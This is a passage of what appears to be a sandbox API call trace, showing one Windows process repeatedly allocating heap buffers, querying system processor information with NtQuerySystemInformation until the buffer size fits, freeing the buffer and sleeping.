[0227.625] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0227.625] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.626] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.626] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0227.626] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0227.626] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.626] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0227.627] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.627] Sleep (dwMilliseconds=0x110) [0227.639] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0227.639] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.640] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.640] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0227.640] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.641] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.641] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0227.641] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.641] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.641] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0227.641] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0227.642] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.642] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0227.642] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.642] Sleep (dwMilliseconds=0x110) [0227.654] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0227.654] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.655] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.655] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0227.655] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.656] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.656] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0227.656] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.657] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.657] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0227.657] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0227.661] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.661] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0227.661] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.662] Sleep (dwMilliseconds=0x110) [0227.669] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0227.670] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.670] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.670] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0227.670] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.671] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.671] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0227.671] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.671] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.672] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0227.672] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0227.672] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.672] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0227.673] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.673] Sleep (dwMilliseconds=0x110) [0227.685] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0227.685] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.686] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.686] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0227.686] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.687] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.687] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0227.687] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.688] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.688] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0227.688] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0227.688] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.688] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0227.689] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.689] Sleep (dwMilliseconds=0x110) [0227.704] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0227.704] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.705] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.705] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0227.705] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.706] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.706] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0227.706] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.706] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.707] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0227.707] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0227.708] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.708] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0227.708] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.709] Sleep (dwMilliseconds=0x110) [0227.717] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0227.717] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.718] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.718] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0227.718] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.718] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.718] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0227.718] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.719] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.719] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0227.719] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0227.719] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.719] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0227.720] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.720] Sleep (dwMilliseconds=0x110) [0227.732] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0227.732] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.732] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.732] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0227.732] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.733] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.733] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0227.733] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.734] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.734] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0227.734] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0227.734] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.734] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0227.735] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.735] Sleep (dwMilliseconds=0x110) [0227.750] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0227.750] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.751] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.751] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0227.751] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.752] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.752] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0227.752] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.752] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.752] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0227.752] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0227.752] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.753] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0227.753] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.753] Sleep (dwMilliseconds=0x110) [0227.768] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0227.768] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.769] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.769] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0227.769] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.769] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.769] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0227.770] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.770] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.770] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0227.770] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0227.770] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.770] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0227.771] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.771] Sleep (dwMilliseconds=0x110) [0227.791] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0227.791] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.791] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.791] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0227.791] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.792] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.797] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0227.797] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.797] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.797] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0227.797] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0227.798] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.798] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0227.798] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.798] Sleep (dwMilliseconds=0x110) [0227.810] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0227.811] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.811] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.811] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0227.811] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.812] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.812] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0227.812] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.812] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.812] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0227.812] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0227.813] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.813] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0227.814] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.814] Sleep (dwMilliseconds=0x110) [0227.826] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0227.827] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.827] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.827] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0227.827] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.828] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.828] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0227.828] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.828] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.828] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0227.828] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0227.829] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.830] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0227.835] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.835] Sleep (dwMilliseconds=0x110) [0227.845] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0227.845] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.845] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.845] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0227.846] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.846] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.846] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0227.846] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.847] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.847] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0227.847] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0227.847] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.847] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0227.848] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.848] Sleep (dwMilliseconds=0x110) [0227.860] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0227.860] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.860] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.860] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0227.860] NtQuerySystemInformation (in: SystemInformationClass=0x8, 